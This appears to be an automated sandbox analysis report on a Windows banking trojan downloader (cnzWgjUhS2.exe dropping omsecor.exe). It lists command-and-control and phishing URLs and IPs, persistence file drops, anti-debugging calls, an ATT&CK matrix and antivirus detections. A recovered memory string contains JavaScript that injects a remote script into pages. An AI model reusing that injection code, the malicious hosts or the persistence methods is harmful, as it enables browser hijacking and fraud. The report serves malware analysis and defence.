Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.htmleZ
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.htmli
Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.htmliZ#
Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.htmloZ
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/59/409.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/59/409.html(&Z&
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/59/409.htmlk7
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.html$
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.html&
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.html(
Source: omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.html;
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.htmlN
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.htmlP&
Source: omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.htmlasuek.com5
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.htmlp
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/968/405.htmlz
Source: cnzWgjUhS2.exe, 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, omsecor.exe, 00000001.00000002.1986846567.0000000000401000.00000040.00000001.01000000.00000004.sdmp, omsecor.exe, 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, omsecor.exe, 00000008.00000002.2986278876.0000000000401000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://domaincntrol.com/?orighost=
          Source: omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nojs.domaincntrol.com

          E-Banking Fraud

          Source: Yara match; File source: Process Memory Space: cnzWgjUhS2.exe PID: 6600, type: MEMORYSTR
          Source: Yara match; File source: Process Memory Space: omsecor.exe PID: 6644, type: MEMORYSTR
          Source: Yara match; File source: Process Memory Space: omsecor.exe PID: 3868, type: MEMORYSTR
          Source: Yara match; File source: Process Memory Space: omsecor.exe PID: 564, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; File created: C:\Windows\SysWOW64\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exe; File created: C:\Windows\SysWOW64\merocz.xc6
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_00401C41
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040D2A4
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040B51C
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040CBD0
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_00401C41
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040D2A4
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040B51C
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040CBD0
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: String function: 00405511 appears 56 times
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: String function: 00405493 appears 31 times
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: String function: 00405511 appears 56 times
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: String function: 00405493 appears 31 times
          Source: cnzWgjUhS2.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engine; Classification label: mal100.bank.troj.evad.winEXE@7/3@3/3
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; File created: C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; File read: C:\Users\user\Desktop\cnzWgjUhS2.exe
          Source: unknown; Process created: C:\Users\user\Desktop\cnzWgjUhS2.exe "C:\Users\user\Desktop\cnzWgjUhS2.exe"
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exe; Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exe; Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Section loaded: wininet.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: wininet.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: iertutil.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: urlmon.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: srvcli.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\omsecor.exe; Section loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: cnzWgjUhS2.exe; Static PE information: section name: UPX2
          Source: omsecor.exe.0.dr; Static PE information: section name: UPX2
          Source: omsecor.exe.1.dr; Static PE information: section name: UPX2
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040D293 push ecx; ret 0_2_0040D2A3
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040CBB5 push ecx; ret 0_2_0040CBC8
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040D293 push ecx; ret 5_2_0040D2A3
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040CBB5 push ecx; ret 5_2_0040CBC8
          Source: initial sample; Static PE information: section name: UPX0
          Source: initial sample; Static PE information: section name: UPX1
          Source: initial sample; Static PE information: section name: UPX0
          Source: initial sample; Static PE information: section name: UPX1
          Source: initial sample; Static PE information: section name: UPX0
          Source: initial sample; Static PE information: section name: UPX1

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\omsecor.exe; Executable created and started: C:\Windows\SysWOW64\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; File created: C:\Windows\SysWOW64\omsecor.exe
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; File created: C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exe; File created: C:\Windows\SysWOW64\omsecor.exe
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040350F RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_004039EA RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040350F RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_004039EA RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW
          Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6636; Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2836; Thread sleep time: -80000s >= -30000s
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040ABD9 FindFirstFileW,FindClose
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040ABD9 FindFirstFileW,FindClose
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000066B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW Control\LRPC-559bf06f72796be679
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000066B000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.00000000005FD000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWH
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWb
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_004075D4 CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,FindCloseChangeNotification,CloseHandle
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\omsecor.exe; Code function: 5_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: cnzWgjUhS2.exe, omsecor.exe; Binary or memory string: Shell_TrayWnd
          Source: cnzWgjUhS2.exe, 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, omsecor.exe, 00000001.00000002.1986846567.0000000000401000.00000040.00000001.01000000.00000004.sdmp, omsecor.exe, 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp; Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_0040CB03 cpuid
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exe; Code function: 0_2_00406CB5 GetVersionExW
          MITRE ATT&CK matrix, one line per tactic (the number in brackets is the count shown next to that technique in the matrix; techniques without a number are the matrix's unflagged cells):

          Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
          Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
          Execution: Native API [1], Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
          Persistence: DLL Side-Loading [1], Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
          Privilege Escalation: Process Injection [2], DLL Side-Loading [1], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
          Defense Evasion: Masquerading [121], Virtualization/Sandbox Evasion [1], Process Injection [2], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [21], Software Packing [1], DLL Side-Loading [1]
          Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
          Discovery: System Time Discovery [2], Security Software Discovery [21], Virtualization/Sandbox Evasion [1], Process Discovery [1], File and Directory Discovery [1], System Information Discovery [13], Remote System Discovery
          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
          Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
          Command and Control: Encrypted Channel [1], Ingress Tool Transfer [2], Non-Application Layer Protocol [2], Application Layer Protocol [12], Fallback Channels, Multiband Communication, Commonly Used Port
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
          Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Source | Detection | Scanner | Label | Link
          cnzWgjUhS2.exe | 100% | Avira | TR/Downloader.Gen |
          cnzWgjUhS2.exe | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Windows\SysWOW64\omsecor.exe | 100% | Avira | TR/Downloader.Gen |
          C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Avira | TR/Downloader.Gen |
          C:\Windows\SysWOW64\omsecor.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Joe Sandbox ML | |

          No Antivirus matches

          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://nojs.domaincntrol.com | 0% | Avira URL Cloud | safe |
          http://lousta.net/161/343.html | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/ | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/100/325.html)L | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.html | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.html; | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/100/325.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/161/343.htmll | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/130/71.htmlcrosoft | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.htmlQZ | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.html3 | 100% | Avira URL Cloud | phishing |
          http://lousta.net/895/196.html# | 100% | Avira URL Cloud | phishing |
          http://lousta.net/601/938.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/347/423.htmlt?E& | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/y | 100% | Avira URL Cloud | phishing |
          https://domaincntrol.com/?orighost= | 0% | Avira URL Cloud | safe |
          http://lousta.net/895/196.html | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.htmlz | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.htmlp | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/130/71.htmlr&& | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.htmliZ# | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.htmleZ | 100% | Avira URL Cloud | phishing |
          http://lousta.net/303/619.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/976/76.html | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.html( | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.html$ | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.htmlP& | 100% | Avira URL Cloud | phishing |
          http://lousta.net/303/619.html= | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.html& | 100% | Avira URL Cloud | phishing |
          http://lousta.net/467/386.htmlQ= | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/59/409.htmlk7 | 100% | Avira URL Cloud | phishing |
          http://lousta.net/161/343.html= | 100% | Avira URL Cloud | phishing |
          http://lousta.net/976/76.htmlmswsock.dll.mui | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.htmli | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/130/71.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/347/423.html( | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/59/409.html | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/88/221.htmlV | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.htmlGU | 100% | Avira URL Cloud | phishing |
          http://lousta.net/ | 100% | Avira URL Cloud | phishing |
          http://lousta.net/&X | 100% | Avira URL Cloud | phishing |
          http://lousta.net/347/423.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/895/196.html_ | 100% | Avira URL Cloud | phishing |
          http://lousta.net/303/619.htmlEc | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/467/386.html | 100% | Avira URL Cloud | phishing |
          http://lousta.net/161/343.htmle | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/100/325.html7 | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.html; | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/179/569.htmloZ | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/59/409.html(&Z& | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.htmlasuek.com5 | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/en-GB | 100% | Avira URL Cloud | phishing |
          http://lousta.net/161/343.htmlT | 100% | Avira URL Cloud | phishing |
          http://lousta.net/601/938.htmlshqos.dll.mui | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/ | 100% | Avira URL Cloud | phishing |
          http://mkkuei4kdsz.com/88/221.html | 100% | Avira URL Cloud | phishing |
          http://ow5dirasuek.com/968/405.htmlN | 100% | Avira URL Cloud | phishing |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          lousta.net | 193.166.255.171 | true | true | | unknown
          mkkuei4kdsz.com | 64.225.91.73 | true | true | | unknown
